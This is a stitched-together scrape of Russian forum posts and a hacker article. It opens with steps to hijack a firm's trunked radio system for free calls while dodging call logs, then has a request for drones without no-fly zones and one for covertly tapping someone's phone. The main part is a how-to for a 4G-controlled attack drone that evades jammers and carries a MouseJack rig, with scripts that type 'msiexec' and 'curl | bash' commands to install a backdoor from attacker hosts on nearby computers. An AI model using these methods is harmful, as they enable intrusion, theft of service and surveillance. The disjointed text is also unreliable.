Так вот нам нужно будет звонить на этот номер, звонить со своего домашнего телефона не советую: транковый контроллер ведет учет всех звонков как с него, так и на него. Лучше с того же "одноразового" мобильника или от соседа (думаю, не надо учить, как сесть на соседскую линию!!!). Подготовительные мероприятия: радиостацию ставим на прием частоты передачи столба, к выходу станции подключаем вход звуковой карты компьютера (или диктофон), запускаем любую программу аудиозаписи. Далее звоним на столб, услышав ответ контроллера ( 2 коротких гудка), пищим стандартными DTMF тонами какое либо число от 100 до 999. Если абонент с таким номером в системе имеется, будет слышен тон вызова. Столб при этом пошлет в эфир сигнал на рацию абонента с этим номером, он то нам и нужен. В начале сигнала будет длинная тональная посылка частотой 1450Гц, после которой последует короткая транковая посылка. Любым аудиоредактором укорачиваем начальный тон с первоначальных трех секунд до 0,1-0,3 секунд. Далее ставим станцию на частоту столба, не забыв установить репитерный разнос и проигрываем в микрофон отредактированную транковую посылку. Если все проделано правильно, услышите тон ответа АТС. Дальше набираем номер теми же DTMF тонами. NB! Если фирма имеет внутренние локальные номера, а они обычно четырех-пяти значные, то выход на городскую АТС осуществляестя через дополнительную цифру перед номером, так что сначала лучше послушать эфир и раскодировать несколько набираемых номеров, чтобы увидеть их структуру.

Еще раз повторю, в транковых контроллерах ведется учет всех звонков, с номерами, датой, временем и длительностью разговора, так что не запалитесь вы на этом деле!

Парни я заметил что здесь есть люди которые разбираются в электрических схемах вот помощь нужна. Нужно показать на схеме как ток по ней идет, прям от источника питания, как от плюса и от минуса. Если можно покажите стрелками. У меня защита диплома 29 го числа я по схеме нифига не знаю , описания нет, вот боюсь спросят как по ней ток течет.

СХЕМА

У кого какие идеи есть подскажите!!Через MoreTv 3.31 по моему мороки много, хотя заманчиво!

Народ кто знает как подключить автомагнитолу?Куда какие концы соеденять чтобы не замкнуть?Если надо могу выложить скрин штекера с проводами.И как находить концы что куда вот таким прибором?

Индикатор напряженности, или как его сделать!Или где взять так чтоб ещё и частоту показывал!!Хотя наверно не реально, а можно и поотдельности два девайса!
Добавлено в [time]1131822322[/time]
А нужен он чтоб экспериментальным методом узнать длинну антенны для большей мощности!

Hello

I currently have DJI Phantom
Which, as most of the major drone brands have hard coded in itself "no-fly zones" ( airports, prisons, bases, certain specific parts of town, specific industrial zones and so on ).

I don't think there is a solution to change entire firmware and put the one without hardcoded no-fly zones, but I am pretty sure that there are certain drone brands, probably less known brands ( some purelly chineese companies or whatever ) which don't have no-fly zones coded in them.

I asked AI already, but is useless, it also mantioned my drone as being the one without no-fly zones.

And and the product description drones are usually not being advertised with having or not having no-fly zones.

Anyone knows specific drone brand which doesn't have no-fly zones hardcoded in it ?

добрый вечер! Тема давно интересует как прослушивать телефон чужой если я не имею к нему доступа, может есть какой нибудь софт?

Ты сидишь за клавиатурой на одном из верхних этажей охраняемого здания, расположенного посреди закрытой территории в окружении забора с колючей проволокой под напряжением. Ты чувствуешь себя в полной безопасности — за ней следят не только камеры, но и бдительная охрана. За окном раздается подозрительное жужжание, ты отвлекаешься на непонятный источник звука, и этих нескольких секунд достаточно, чтобы на твой компьютер установился бэкдор, а хакер, расположенный в 20 км от тебя, проник в корпоративную сеть. Фантастика? Ничего подобного!

Дрон — отличный инструмент для злоумышленника, поскольку такой аппарат может нести на себе до трети собственного веса в виде полезной нагрузки. Но атаковать удаленный объект «по воздуху» не так‑то просто: «хакерский дрон» должен обладать высокой автономностью, управляться по защищенному каналу на расстоянии в десятки километров, а еще уметь противостоять средствам подавления и «глушилкам». Сегодня мы подробно расскажем, как устроены такие дроны и как их можно собрать из подручных средств, модифицировав обычный бюджетный квадрокоптер. И разумеется, о том, как эффективно противостоять таким хитрым девайсам.

В предыдущей статье я описал атаки, требующие непосредственного присутствия злоумышленника поблизости от атакуемого объекта. Но ограниченный радиус беспроводных сетей не позволяет «дотянуться» абсолютно до всех целей. Однако устройство столь малого размера можно не только незаметно спрятать под окнами, его можно поместить внутрь небольшой посылки и направить кому угодно. И тогда, двигаясь по коридорам зданий, оно будет способно совершить уже совсем иные атаки. Правда, посылка — это для устройства Pineapple билет в один конец. Беспроводные атаки можно проводить и с помощью дрона.

Дроны стали незаменимы в самых разных областях, и сегодня они доступны практически каждому. Но что они могут дать хакеру?

Важная особенность дрона заключается в том, что к нему можно присоединить фактически что угодно. Таким образом дрон может значительно увеличить дистанцию применения атак, ведь он позволяет быстро получить физический доступ туда, куда нельзя добраться ногами. Дрон может преодолеть почти любое ограждение, подлететь к окнам высотного здания и, что немаловажно, сделать это достаточно быстро, а иногда и незаметно. Миниатюрные габариты позволяют ему пролететь даже в приоткрытое окно, проникнуть в помещение и молниеносно совершить компьютерные атаки. Одним словом, с таким средством доступной становится практически любая цель.

Это делает дрон крайне удобным для проведения быстрых атак, реализуемых через беспроводные технологии — то есть там, где требуется фиксированный и часто небольшой радиус действия. Так что атаки, показанные в некоторых компьютерных играх, вполне реальны.

РЕАЛИЗАЦИЯ​

Дроны в большинстве случаев управляются по радиоканалу. При этом частоты и протоколы для приема сигнала с пульта (RX), а также для передачи видео и телеметрии с дрона (TX) могут отличаться. В обобщенном виде это выглядит так:

• RX по выделенным радиоканалам FRSKY, ELRS или TBS, TX аналоговый, реже цифровой выделенный канал (профессиональные дроны);
• RX по выделенным радиоканалам, TX по Wi-Fi (самый распространенный вариант);
• RX и TX по Wi-Fi (комнатные дроны).

Для атакующего дрон главным образом транспортное средство, поэтому он должен быть крепким и надежным. Поскольку почти все атаки так или иначе могут быть связаны с близким пролетом вблизи строений, а где‑то даже и внутри них, то куда важнее обеспечить максимальную защиту пропеллеров, нежели высокую скорость. Отличным выбором могут быть дроны с защитной рамой вокруг пропеллеров (Cinewhoop), как на следующем рисунке.

Такая конструкция не позволяет дрону разбиться в случае контакта со стеной или другими препятствиями. Дрон также должен иметь некоторый запас мощности, достаточный для подъема хакерских девайсов массой хотя бы с треть его веса.

Поскольку злоумышленник может атаковать отдаленные объекты, использовать для этого целесообразно дроны, управление которых завязано не на Wi-Fi. Ведь радиус Wi-Fi ограничен 50–100 м, и управляемость (отклик) ухудшается по мере отдаления дрона от пульта управления. Профессиональные дроны с выделенным радиоканалом управления (FRSKY, ELRS или TBS) подходят для подобных целей куда лучше. По прямой видимости дрон на таком управлении может улететь на несколько километров, и время отклика при этом держится на приемлемом уровне.

Раз летать злоумышленнику придется не в чистом поле, а вблизи зданий, где находятся объекты атак, то немаловажен и контроль над полетом. Дроны семейства FPV обеспечивают максимально возможное погружение и вид от первого лица.

Отличным выбором по гибкости, открытости компонентов и простоты станут популярные дроны с полетным контроллером системы Betaflight. Основные плюсы подобных открытых решений:

• возможность модификации — всегда можно добавить или убрать тот или иной компонент (датчик высоты, GPS и прочее);
• открытость — дрон всегда доступен для различных модификаций и нестандартных решений;
• модульность — если дрон разобьется, то приобрести нужно будет только раму; полетный контроллер, приемник, пульт и очки остаются невредимыми.

На самом деле не так важна модель дрона, куда важнее умение хорошо летать. Прежде чем переходить к атакам с дрона, стоит немного поговорить, как возможно улучшить управление дрона и защитить его.

Управление через 4G​

Полеты среди зданий могут сильно уменьшить предельную дистанцию. Даже если у дрона супердальнобойная система связи, она не пробьет несколько бетонных стен, когда квадрокоптер залетит за здание.

Но что, если дрон будет управляться по мобильным сетям? В наше время хороший прием обеспечивается даже за пределами города, не говоря уже про здания. Сотовую связь можно использовать в качестве отличного канала для передачи данных. Тогда расстояние полета будет ограничено исключительно ресурсом аккумулятора.

Сегодня 4G-сети обладают достаточно высокой скоростью, но при их использовании отклик от пульта управления и картинка с камеры не передаются с той же скоростью, как на специально разработанных для этого радиопротоколах. Тем не менее полет вполне возможен. А с учетом скорости, с которой дроны способны лететь (200 км/ч), и запаса аккумулятора злоумышленник может атаковать цель на расстоянии более 20 км!

Итак, как перевести дрон на 4G-управление? Это должно быть не очень сложное решение, применимое к широкой линейке доступных моделей. Можно использовать, например, следующую схему.

4G → Wi-Fi-шлюз → дрон​

Самые простые и дешевые дроны полностью управляются по Wi-Fi. Внутри дрона запущена точка доступа Wi-Fi, мобильный телефон подключается к ней и через приложение отправляет команды в обычный UDP-порт. Видео с дрона идет в обратном направлении на телефон простым RTSP-стримом. Получается, дрон — это обычное сетевое устройство. Следовательно, если к нему прикрепить мини‑компьютер с 4G-модемом, то через VPN можно проброситься прямо в дрон с любого расстояния. И далее останется лишь отправлять закодированные команды управления моторами.

Однако в этом способе есть пара минусов. Во‑первых, скорее всего, придется иметь дело с закрытым протоколом и реверсить его с успешностью 50/50 — повезет или нет. Возможно, попадется шифрование, а возможно — аутентификация с неизвестным принципом. Словом, взламывать собственный дрон, чтобы полетать, несколько странно. Во‑вторых, в такие протоколы закладывают достаточно частую отправку пакетов от пульта на дрон. Это сделано для лучшего отклика при управлении. Кроме того, так дрон оперативно понимает, если сигнал с пультом теряется. Тут абсолютно невыгодно отправлять по сети одни и те же пакеты на дрон, ведь так 4G-канал управления будет забит, а по нему должно передаваться еще и видео.

4G → видеошлюз → дрон​

А что, если вместо сетевого шлюза для доступа к дрону воспользоваться видеошлюзом? То есть к квадрокоптеру прикрепить небольшой телефон, подключенный к нему по Wi-Fi, а к самому телефону подключиться с помощью средства удаленного управления? Ведь в любом случае видео с дрона нужно смотреть, только теперь это можно будет делать с экрана удаленного телефона.

Как ни странно, этот способ позволяет решить все проблемы. Телефон дает отвязку по трафику — все пакеты с требуемой скоростью он отправляет сам, пилот лишь через виртуальные стики на экране удаленного телефона управляет дроном. Также видеопоток с экрана телефона принимается уменьшенного качества, что еще немного увеличивает скорость передачи. Плюсом мобильное приложение берет на себя кодирование положений стиков пульта, так что ничего реверсить не требуется. Пример такой реализации приведен на следующем рисунке.

Простой до невозможности трюк, но на самом деле он позволит преодолеть любые расстояния и преграды. Мини‑телефон, прикрепленный к дрону, всегда будет обеспечивать ему приемлемый уровень сигнала Wi-Fi, который на таком расстоянии крайне сложно заглушить подавителем. Также он дает развязку по трафику — не нужно принимать высококачественный стрим с дрона, а вместо этого достаточно лишь получить картинку с экрана телефона в разрешении 320 × 240, передача которой более надежна при просадках скорости мобильного соединения. Еще такой подход обеспечивает развязку и по протоколу: больше не нужно вникать в подробности кодирования положений стиков троттлинга, крена, углов атаки и рысканья — мобильное приложение все сделает самостоятельно.

Подключиться к дрону по 4G можно с любого устройства — хоть с ноутбука, хоть с телефона. Для этого можно использовать любое программное решение для облачного удаленного управления, например кросс‑платформенный AnyDesk.

Далее, используя простые средства автоматизации GUI, можно назначить тем или иным нажатиям на клавиатуре определенные действия с виртуальным пультом на экране:

drone/control.sh​

Bash:Copy to clipboard

#!/bin/bash
console=$(xdotool getactivewindow)
control=$(xwininfo | grep id | grep 'xwininfo:' | awk '{print $4}')
xdotool windowfocus $control
X=$(xwininfo -id $control | grep 'Absolute upper-left X:' | awk '{print $4}')
Y=$(xwininfo -id $control | grep 'Absolute upper-left Y:' | awk '{print $4}')
left_stick_x=$[$X+123]
left_stick_y=$[$Y+321]
right_stick_x=$[$X+456]
right_stick_y=$[$Y+321]
xdotool windowfocus $console
while read -rsn 1 key
do
  case "$key" in
    'A')
      echo 'throttle up'
      xdotool mousemove $left_stick_x $left_stick_y
      xdotool mousedown 1
      xdotool mousemove_relative -- '0' '-50'
      xdotool mouseup 1
      ;;
    'B')
      echo 'throttle down'
      xdotool mousemove $left_stick_x $left_stick_y
      xdotool mousedown 1
      xdotool mousemove_relative -- '0' '50'
      xdotool mouseup 1
      ;;
    'w')
      echo 'pitch forward'
      xdotool mousemove $right_stick_x $right_stick_y
      xdotool mousedown 1
      xdotool mousemove_relative -- '0' '-50'
      xdotool mouseup 1
      ;;
    's')
      echo 'pitch back'
      xdotool mousemove $right_stick_x $right_stick_y
      xdotool mousedown 1
      xdotool mousemove_relative -- '0' '50'
      xdotool mouseup 1
      ;;
    'a')
      echo 'roll left'
      xdotool mousemove $right_stick_x $right_stick_y
      xdotool mousedown 1
      xdotool mousemove_relative -- '-50' '0'
      xdotool mouseup 1
      ;;
    'd')
      echo 'roll right'
      xdotool mousemove $right_stick_x $right_stick_y
      xdotool mousedown 1
      xdotool mousemove_relative -- '50' '0'
      xdotool mouseup 1
      ;;
    'q')
      echo 'yaw left'
      xdotool mousemove $left_stick_x $left_stick_y
      xdotool mousedown 1
      xdotool mousemove_relative -- '-50' '0'
      xdotool mouseup 1
      ;;
    'e')
      echo 'yaw right'
      xdotool mousemove $left_stick_x $left_stick_y
      xdotool mousedown 1
      xdotool mousemove_relative -- '50' '0'
      xdotool mouseup 1
      ;;
  esac
  xdotool windowfocus $console
done

Тут в бесконечном цикле происходит ожидание нажатия тех или иных клавиш, после чего, в соответствии с нажатием, курсор мыши двигает виртуальный стик на экране удаленного телефона. Все максимально просто.

Данные о состоянии дрона (телеметрия) также в распоряжении оператора, пример представлен на следующем рисунке.

В зависимости от модели дрона и мобильного приложения картинка может отличаться. Используя те же самые средства автоматизации GUI, а также распознавание текста, можно реализовать произвольную обработку показаний телеметрии:

drone/telemetry.sh​

Bash:Copy to clipboard

#!/bin/bash
INTERVAL=1
control=$(xwininfo | grep id | grep 'xwininfo:' | awk '{print $4}')
while sleep $INTERVAL
do
    gm import -window $control /tmp/drone_telemetry.png
    gm convert /tmp/drone_telemetry.png -crop 240x60+740+58 /tmp/drone_telemetry-bat.png
    bat=$(tesseract /tmp/drone_telemetry-bat.png stdout -l eng 2> /dev/null | grep '^[0-9]' | awk '{print $1}')
    gm convert /tmp/drone_telemetry.png -crop 240x60+461+58 /tmp/drone_telemetry-alt.png
    alt=$(tesseract /tmp/drone_telemetry-alt.png stdout -l eng 2> /dev/null | grep '^[0-9]')
    if [ "$bat" -lt 10 ]; then
        echo 'low battery' | festival --tts --language english
    fi
    clear
    echo "$bat $alt"
done

Здесь выполняется цикличное распознавание текста различных областей экрана, на которых расположены те или иные показания. После их преобразования с изображения на экране в понятную компьютеру форму можно обрабатывать их дальше. В этом примере скрипт использует синтезатор речи для информирования о низком заряде аккумулятора.

С помощью этих примитивов управления и телеметрии можно полностью автоматизировать полет дрона.

Подобный подход чрезвычайно прост в исполнении и сразу открывает доступ и к управлению, и к телеметрии, но имеет лишнее звено — телефон с Wi-Fi. Сигнал от телефона может быть слишком сильный, что может негативно сказаться на управлении. Плюс ко всему дрон в этом случае вынужден поднимать достаточно большую лишнюю массу (около 50 г).

4G → UART → дрон​

Но зачем удаленно подключаться к дрону через его явные интерфейсы управления (по Wi-Fi)? Почему бы злоумышленнику не подключиться напрямую к его полетному контроллеру? В случае с дронами по типу «готового решения» можно столкнуться, скорее всего, все с той же проблемой — закрытым протоколом и необходимостью его реверсить.

Однако есть множество открытых решений для управления дронами, например прошивки Betaflight, iNav или Ardupilot. Самое простое из них — Betaflight среди прочего поддерживает прямую отправку команд управления моторами в полетный контроллер через уже знакомый UART. Это значит, что управлять дроном можно почти с любого одноплатника. Стоит лишь подключить к нему 4G-модуль и настроить VPN. Все‑таки с открытыми решениями работать куда приятнее.

Итак, атакующему сначала необходим одноплатный компьютер минимального размера и массы, а также 4G-модем. Отличный вариант — NanoPi Neo Air и Sim7600G, оба устройства миниатюрны и практически идентичны по габаритам.

Взаимодействие с 4G-модемом идет по UART-интерфейсу, которых у NanoPi целых три. Первый UART можно использовать для интернет‑канала, а второй уже для связи с дроном. На следующем рисунке представлена распиновка контактов на мини‑компьютере NanoPi для управления дроном и связи по 4G.

После небольшой пайки модуль удаленного управления по 4G может выглядеть так, как продемонстрировано на следующем рисунке.

Даже самые простые полетные контроллеры часто имеют минимум два UART- интерфейса, один из которых, скорее всего, занят штатным приемником, а второй как раз можно использовать для удаленного управления по 4G. Подключение NanoPi к полетному контроллеру происходит аналогично штатному приемнику — с помощью UART.

Так можно переключать дрон на тот или иной режим управления без физического вмешательства и перепайки, исключительно программным способом (о нем чуть позже). Все, что требуется, — только прикрепить NanoPi + Sim7600G и соединить соответствующий шлейф. В итоге дрон с 4G-управлением выглядит примерно так.

В зависимости от размеров и формы дрона плату можно устанавливать в разных местах и даже внутри корпуса рамы. Можно даже распечатать соответствующие крепления на 3D-принтере.

Пора перейти к программной настройке. Одноплатный компьютер NanoPi крайне удобен в настройке — он эмулирует консоль прямо по USB, когда на него подается питание. Все, что требуется для работы с ним, — это лишь открыть консоль непосредственно на USB:

Code:Copy to clipboard

minicom -D /dev/ttyACM0 -b 9600

Далее все действия производятся уже внутри NanoPi. Сначала необходимо отключить все лишнее:

Code:Copy to clipboard

systemctl disable wpa_supplicant.service
systemctl disable NetworkManager.service

И активировать два UART:

Code:Copy to clipboard

armbian-config
 System -> Hardware:
    Включаем uart1 и uart2, перезагружаемся

Далее нужно поставить необходимые пакеты:

Code:Copy to clipboard

apt install minicom openvpn python3-pip cvlc

Minicom не обязателен, но он может потребоваться для пусконаладки — проверки, правильно ли работает UART и на каком порте что у нас расположено. Например, так можно удостовериться, что NanoPi и Sim7600G-модем слышат друг друга через первый UART-интерфейс:

Code:Copy to clipboard

minicom -D /dev/ttyS1 -b 115200
AT

Если все ок, то для модема должна быть прописана конфигурация мобильного подключения:

/etc/ppp/peers/tele2​

Code:Copy to clipboard

connect "/usr/sbin/chat -v -f /etc/chatscripts/gprs -T internet.tele2.ru"
/dev/ttyS1
115200
noipdefault
usepeerdns
defaultroute
persist
noauth
nocrtscts
local
user "tele2"
password "tele2"
debug
refuse-chap
refuse-mschap
refuse-mschap-v2
refuse-eap

/etc/chatscripts/gprs​

Code:Copy to clipboard

ABORT           BUSY
ABORT           VOICE
ABORT           "NO CARRIER"
ABORT           "NO DIALTONE"
ABORT           "NO DIAL TONE"
ABORT           "NO ANSWER"
ABORT           "DELAYED"
ABORT           "ERROR"
ABORT           "+CGATT: 0"
""              AT
TIMEOUT         12
OK              ATH
OK              ATE1
OK              AT+CGDCONT=1,"IP","\T","",0,0
OK              ATD*99#
TIMEOUT         22
CONNECT         ""

Теперь, чтобы активировать 4G, выполняем следующую команду:

Code:Copy to clipboard

pon tele2

Если сеть появилась и ping идет, значит, эти две крошечные платы всегда смогут выйти на связь по 4G-интернету, где бы они ни находились. Чтобы при включении устройства сразу поднималась сеть, нужно подготовить следующий файл:

/etc/network/interfaces​

Code:Copy to clipboard

auto tele2
iface tele2 inet ppp
provider tele2

Мобильный интернет — это лишь физический линк. Далее требуется логический линк, чтобы можно было выйти на связь с устройством. Для этого нужно подключить устройство к некоторому опорному серверу по VPN:

Code:Copy to clipboard

cp your_vds.ovpn /etc/openvpn/client/vds.conf
systemctl enable openvpn-client@vds

Если все прошло нормально, то теперь всегда после включения устройства к нему можно получить доступ, соединившись с ним по VPN через выделенный опорный сервер. Настало время немного поговорить о том, как NanoPi может управлять двигателями дрона.

Современные полетные контроллеры — весьма сложные устройства, которые, как правило, поддерживают массу протоколов управления. И если на физическом уровне для связи с полетным контроллером используется UART, то на логическом проще всего реализовать управление через протокол MSP и соответствующую Python- библиотеку:

Code:Copy to clipboard

cd /opt/
git clone https://github.com/alduxvm/pyMultiWii
pip3 install pyserial

Протокол достаточно простой, а сама библиотека требует лишь знания номера порта. NanoPi подключен к полетному контроллеру дрона с помощью UART2, следовательно, это ttyS2-порт. Имея порт, можно уже отправлять значения основных каналов: крена, оборотов пропеллеров и так далее, а также вспомогательных каналов:

~/src/control.py​

Python:Copy to clipboard

#!/usr/bin/python3
from sys import path; path.append("/opt/pyMultiWii/")
from time import sleep
from threading import Thread
from pymultiwii import MultiWii
board = MultiWii("/dev/ttyS2")
roll=1500
pitch=1500
throttle=988
yaw=1500
aux1=1000
aux2=1500
aux3=1500
aux4=1500
def arm():
    global aux1
    aux1 = 2000
def disarm():
    global aux1
    aux1 = 1000
def send():
    INTERVAL = 0.01
    while True:
        board.sendCMD(16, MultiWii.SET_RAW_RC, [roll,pitch,throttle,yaw,aux1,aux2,aux3,aux4])
        sleep(INTERVAL)
main = Thread(target=send, args=())
main.start()
do_something()
main.join()

Стоит отметить, что, даже если дрон не летит и на его двигатели не подаются никакие команды, на него все равно должны непрерывно отправляться данные с нейтральными значениями стиков управления, причем достаточно часто. Так полетный контроллер понимает, что связь с приемником все еще поддерживается.

Чтобы полетный контроллер знал, откуда брать команды управления двигателями, в его настройках нужно указать, что NanoPi физически соединен с его интерфейсом UART2, а программно используется протокол MSP. Для Betaflight cделать это можно с помощью программы BetaflightConfigurator, как показано на следующих рисунках.

Если все сделано правильно, то с любого расстояния появится возможность удаленно управлять таким дроном, пока есть сигнал мобильных сетей и, конечно же, пока не сел аккумулятор.

Передавать видео можно, подсоединив DVP-камеру напрямую к плате NanoPi. А стрим картинки с нее по сети возможен посредством следующего кода:

Code:Copy to clipboard

cvlc v4l2:///dev/video0:chroma=h264:width=800:height=600 --sout '#transcode {vcodec=h264,acodec=mp3,samplerate=44100}:std{access=http,mux=ffmpeg{mux=flv},dst=0.0.0.0:8080}' –vvv

Чтобы удаленно видеть картинку с дрона на любом расстоянии, нужно просто открыть в браузере «http://drone:8080/», где drone — IP-адрес VPN NanoPi.

Приведенные выше шаги реализации управления дроном через мобильные сети — это лишь концепт, демонстрирующий все необходимые примитивы связей. Чтобы дрон реально полетел и не разбился, требуется реализовать еще удобный интерфейс управления.

Этого можно добиться через подключение пульта, например EdgeTX, способного работать как HID-устройство. А также через трансляции положений его стиков в команды управления, которые передаются по сети на NanoPi, интерпретируются там в соответствующие MSP-команды и по UART попадают на полетный контроллер.

А можно пойти более универсальным способом, позволяющим управлять полетом без специального оборудования, прямо с клавиатуры ноутбука или экрана телефона. Это проще всего реализовать через небольшое веб‑приложение, средствами JavaScript, считывая соответствующие события клавиатуры и нажатия по виртуальным стикам в сообщения, оперативно передаваемые по сети через WebSockets на NanoPi.

Для систем под управлением Ardupilot существуют даже готовые решения.

Защита от глушилок​

Проблему помех от зданий и ограниченного радиуса управления можно решить представленными выше способами, превратив вышки сотовой связи из главного источника помех в лучшего друга.

Но для дронов есть еще одна опасность, которая их может поджидать непосредственно на самих объектах, — это подавители дронов, или глушилки.

Для большинства подобных устройств must-have является подавление частот 2,4 ГГц, на которых летает подавляющее большинство простых дронов (с управлением по Wi-Fi). Сюда же попадает часть частот и профессиональных дронов. У серьезных глушителей дронов в частотах подавления учтены каналы управления всех профессиональных протоколов (TBS, ELRS, FRSKY и прочих) — 800, 900, 2400 МГц.

Однако самая распространенная мера противодействия дронам — глушение или спуфинг сигналов GPS. Подделав сигналы со спутников, дрону можно внушить любое местоположение, что может быть использовано для контроля над его перемещением. Так как в достаточно многих протоколах управления дронами применяется серьезное шифрование, вполне логичной выглядит атака на GPS, так как она представляется наиболее общей. Поэтому GPS-приемник оказывается еще одним слабым местом дронов. И потенциальный злоумышленник, не желающий, чтобы его дрон был сбит такой глушилкой, должен избавиться от GPS.

В некоторых «готовых» моделях дронов бортовой GPS можно отключить программно. FPV-дроны Cinewhoop часто используются в полетах по помещениям, где, как известно, GPS практически не ловится. Поэтому часто GPS-приемники в такие модели не ставят. Дроны с открытыми системами управления, такими как Betaflight, имеют модульную структуру и всегда позволяют как включить, так и отключить бортовой GPS, чего нельзя сказать о более бюджетных вариантах, которые просто отказываются лететь без него.

Что касается глушения каналов управления, то заглушить дрон с управлением по мобильным сетям тоже не так‑то просто. Ведь теперь нужно подавлять сразу ряд диапазонов мобильных сетей разных поколений. А вариантов частот у 2G, 3G и 4G немало. Если заглушить все 4G-сети (2600, 1900, 2300, 2500 МГц), модем дрона перейдет на 3G (2100, 1900, 1800, 850, 2600, 900, 800 МГц), заглушаем и их — перейдет на 2G (900, 1800, 1900 МГц).

Тем не менее существуют направленные радиопушки, отключающие мощным импульсом вообще все радио, но им, впрочем, требуется достаточно точное наведение на цель.

PINEAPPLE​

Время поподробнее рассмотреть сами атаки. Для хакера дрон лишь транспорт. Реально все атаки злоумышленник может проводить с помощью некоторого миниатюрного устройства, прикрепленного к такому дрону. Это может быть уже знакомый по предыдущей статье Pineapple. Он без проблем поместится на любой дрон, ведь он маленький и легкий.

Так как этот хакерский девайс может доставляться на место хоть дроном, хоть почтовым голубем, то важна его масса. Суммарно масса такого Pineapple вместе с аккумулятором получается всего от 17 до 43 г, в зависимости от типа батареи. Дроны имеют запас мощности для противодействия ветру и установки экшн‑камер и спокойно могут поднять от трети до половины своей изначальной массы без значительной потери летных характеристик. Так что с таким грузом справится почти любой, даже карманный селфи‑дрон. И это еще одно несомненное преимущество перед громоздким готовым устройством Pineapple от hak5 — его сможет поднять далеко не каждый дрон.

Молниеносность — это главное условие, которое потенциальный злоумышленник учитывает при планировании атак с дрона. Если в предыдущей статье про Pineapple рассмотрены статичные атаки на беспроводные сети, когда требуется долго находиться в неподвижной точке, то с дроном целесообразнее проводить динамичные атаки — быстрые и мобильные, покрывающие множество целей.

Но какие беспроводные технологии могут быть атакованы столь стремительно, что у дрона не успеет сесть аккумулятор? Вполне очевидно, что это должны быть атаки, слабо завязанные на людей, так как людям часто требуется много времени, чтобы принять решение. Другое дело — чисто компьютерные атаки, не требующие никакого участия пользователя. Машины не так медлительны, как человек, и есть несколько zero click атак, проведение которых занимает несколько секунд. При этом дрону не нужно даже совершать коротких остановок — все может происходить прямо во время полета.

Далее представлено несколько таких атак, начиная с самых критичных.

Mousejack​

Существует распространенная уязвимость, надежно, на десятилетия засевшая в сотнях тысяч беспроводных мышек и клавиатур. Ее эксплуатация возможна с кинематографичной эффективностью — высочайшей скоростью (одна‑две секунды) и максимальным импактом — RCE, и атакующий сразу получает шелл. И имя ей — Mousejack.

Атака на беспроводные HID-устройства (мыши и клавиатуры) — это, пожалуй, самая зрелищная атака, способная скомпрометировать компьютер за секунды. Она считается самой опасной из всех возможных атак, так как позволяет минимальными усилиями, по радиоканалу, удаленно отправить произвольные нажатия клавиш, иными словами, выполнить произвольный код. Никаких предварительных подборов паролей, особых действий пользователя — сразу RCE.

Эту атаку можно эффективно проводить с помощью специального устройства CrazyRadio PA и любого одноплатника, например Raspberry, или уже знакомого нам устройства Pineapple, разработанного специально для атак на беспроводные сети. Условие старта для атаки может быть добавлено так:

startup.sh​

Bash:Copy to clipboard

...
elif lsusb | grep -q 'Nordic Semiconductor'; then
  echo "[*] mousejack attack"
  cd mousejack
  screen -dmS mousejack -t jackit -L -Logfile "$time-mousejack-%n.log" './mousejack.sh'
  cd -
...

Иными словами, если в Pineapple вставлен донгл CrazyRadio PA, то автоматически запускается атака на беспроводные мыши и клавиатуры:

mousejack/mousejack.sh​

Bash:Copy to clipboard

#!/bin/bash
led green on
python3 jackit --autopwn --script ducky.txt
led green off

Так как атакующий не знает адреса беспроводных устройств, он вынужден атаковать все, что слышит в радиоэфире, поэтому используется флаг autopwn.

Если соединить CrazyRadio с Pineapple, получится очень опасное хакерское устройство.

Дрон с таким устройством сможет пробить периметр практически любой компании.

Такой дрон будет атаковать все устройства вокруг себя, пока летит.

Эксплуатация Mousejack очень похожа на BadUSB-hid. Тут атакующий сталкивается с теми же проблемами при наборе команд:

• при использовании нажатий клавиш приходится угадывать языковую раскладку;
• при использовании ALT-кодов для набора текста команд (возможно только на Windows) — угадывать статус клавиши Num Lock.

И в том и в другом случае злоумышленнику придется для надежности засылать нажатия дважды, меняя либо раскладку, либо статус NumLock. Но в случае с ALT- кодами понадобится в три‑четыре раза больше нажатий. А если нет разницы, то зачем передавать больше? В общем, тут снова рациональнее использовать простой метод отправки нажатий непосредственно самих клавиш вместо их кодов:

mousejack/ducky.txt​

Code:Copy to clipboard

GUI SPACE
GUI r
DELAY 300
STRING msiexec /i https://en.attacker.tk/backdoor.msi /quiet
DELAY 300
ENTER
SHIFT ALT
DELAY 300
SHIFT CTRL
DELAY 300
GUI r
DELAY 300
STRING msiexec /i https://ru.attacker.tk/backdoor.msi /quiet
DELAY 300
ENTER

Так как используется радиоканал, атакующий неизбежно столкнется с помехами. Чем длиннее набираемая команда, тем больше вероятность, что та или иная клавиша «не долетит». Достаточно всего одной ошибки, чтобы RCE-команда не распозналась.

Приведенный здесь пример уже знаком читателям по статье про BadUSB-hid. Эта возможность имеется в любой ОС Windows, она позволяет за одно действие скачать и запустить указанную программу удаленного управления. Под ОС семейства Unix злоумышленник может использовать команду из разряда curl -L http://rce.attacker.tk/1.sh|bash.

Далее успешность атаки зависит только от ловкости управления дроном и наличия беспроводных мышек в радиусе около 10–15 м. Pineapple на дроне будет пытаться взломать каждый компьютер через вновь пойманный радиосигнал от мышки или клавиатуры. Эффект атаки делает ее похожей на фильм или игру про хакеров, где взлом с помощью дрона происходит за несколько секунд.

Реальный мир отличается от вымышленного. Большая часть из того, что показано в играх и фильмах о возможностях хакеров, имеет мало общего с реальностью, но эта атака — одна из немногих, которые в жизни выглядят точно так же, как на экране.

Представь: ты сидишь дома или работаешь в офисе, где‑нибудь на верхних этажах или в глубине режимного объекта, в сотнях метров от охраняемого контрольно‑пропускного пункта. Кажется, что ты в полной информационной безопасности и внешний нарушитель до тебя не доберется. Но тут к зданию подлетает подобный дрон, и, пока ты удивленно смотришь на него через окно (а возможно, ты даже и не заметишь его вовсе), он всего за секунду запустит вредоносный код на твоем компьютере. Так что ты вряд ли успеешь заметить что‑либо подозрительное, а если и заметишь, то вряд ли сопоставишь появление в небе дрона с установкой бэкдора на твоем компьютере. С использованием этого метода злоумышленник сможет проникнуть в корпоративную сеть — последствия этого, думаю, объяснять никому не нужно.

Дрон использует еще и эффект отвлечения: пользователь смотрит в окно, пока на его ноутбуке на долю секунды всплывает окно «Пуск → Выполнить» и запускается бэкдор или RAT. Через пару минут, вероятно, злоумышленник уже успеет опробовать пару‑тройку эксплоитов.

